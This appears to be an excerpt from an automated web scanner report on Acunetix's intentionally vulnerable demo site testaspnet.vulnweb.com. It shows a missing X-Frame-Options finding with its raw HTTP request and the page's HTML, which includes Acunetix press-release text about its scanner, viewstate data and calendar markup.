value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" 